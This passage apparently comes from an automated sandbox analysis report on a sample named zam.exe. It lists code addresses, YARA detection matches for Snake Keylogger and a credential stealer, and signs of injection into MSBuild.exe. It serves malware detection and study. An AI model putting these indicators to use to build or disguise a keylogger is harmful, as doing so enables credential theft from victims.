Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BF480	21_2_056BF480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B0491	21_2_056B0491
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BE768	21_2_056BE768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BE778	21_2_056BE778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BB348	21_2_056BB348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BB358	21_2_056BB358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BE320	21_2_056BE320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BAF00	21_2_056BAF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BE310	21_2_056BE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BBBF8	21_2_056BBBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BEBC1	21_2_056BEBC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BEBD0	21_2_056BEBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B77A8	21_2_056B77A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BB7A0	21_2_056BB7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BB7B0	21_2_056BB7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BDA63	21_2_056BDA63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B3278	21_2_056B3278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BDA70	21_2_056BDA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BD609	21_2_056BD609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B6E00	21_2_056B6E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BD618	21_2_056BD618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BAEEF	21_2_056BAEEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BDEC8	21_2_056BDEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056BDEB8	21_2_056BDEB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4B290	21_2_06B4B290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B462C8	21_2_06B462C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4D218	21_2_06B4D218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4A600	21_2_06B4A600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4EE0D	21_2_06B4EE0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B49FB0	21_2_06B49FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B48BF9	21_2_06B48BF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4CBD0	21_2_06B4CBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4BF30	21_2_06B4BF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4B8E0	21_2_06B4B8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4AC48	21_2_06B4AC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B485B0	21_2_06B485B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4C580	21_2_06B4C580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B40D48	21_2_06B40D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B462B9	21_2_06B462B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4B281	21_2_06B4B281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B436D8	21_2_06B436D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B45A18	21_2_06B45A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B45A08	21_2_06B45A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4D209	21_2_06B4D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B45E70	21_2_06B45E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B45E60	21_2_06B45E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B49FA0	21_2_06B49FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B46FF8	21_2_06B46FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B46FE8	21_2_06B46FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B443D8	21_2_06B443D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4CBC0	21_2_06B4CBC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B46720	21_2_06B46720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4BF20	21_2_06B4BF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B46710	21_2_06B46710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B46B78	21_2_06B46B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B43360	21_2_06B43360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B46B69	21_2_06B46B69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B43350	21_2_06B43350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B478A8	21_2_06B478A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B47898	21_2_06B47898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B40498	21_2_06B40498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B40488	21_2_06B40488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B408F0	21_2_06B408F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B47CF0	21_2_06B47CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B408E1	21_2_06B408E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4B8D0	21_2_06B4B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4AC37	21_2_06B4AC37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4743F	21_2_06B4743F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B40006	21_2_06B40006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B47450	21_2_06B47450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B42858	21_2_06B42858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B40040	21_2_06B40040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B42848	21_2_06B42848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B455B1	21_2_06B455B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B485A0	21_2_06B485A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B4A5F0	21_2_06B4A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B455C0	21_2_06B455C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B45133	21_2_06B45133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B47D00	21_2_06B47D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B48158	21_2_06B48158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B45140	21_2_06B45140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_06B48148	21_2_06B48148

Source: zam.exe, 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs zam.exe
Source: zam.exe, 00000000.00000002.1311258310.0000000003E53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs zam.exe
Source: zam.exe, 00000000.00000002.1310701258.0000000002808000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs zam.exe
Source: zam.exe, 00000000.00000002.1307886582.000000000083E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs zam.exe
Source: zam.exe, 00000000.00000002.1314345090.0000000006EB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs zam.exe
Source: zam.exe, 00000000.00000000.1255685294.0000000000324000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameKNSd.exe" vs zam.exe
Source: zam.exe	Binary or memory string: OriginalFilenameKNSd.exe" vs zam.exe

Source: zam.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.zam.exe.4117110.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.zam.exe.4137b30.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: zam.exe PID: 7640, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: zam.exe PID: 7640, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: MSBuild.exe PID: 5892, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: zam.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HaNkyQWPIIzrnC.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.zam.exe.4117110.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.zam.exe.4117110.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.zam.exe.4117110.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.zam.exe.4117110.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.zam.exe.4137b30.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.zam.exe.4137b30.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.zam.exe.4137b30.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.zam.exe.4137b30.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.zam.exe.6eb0000.7.raw.unpack, YTeue59Oa2xSvXIC3I.cs	Security API names: _0020.SetAccessControl
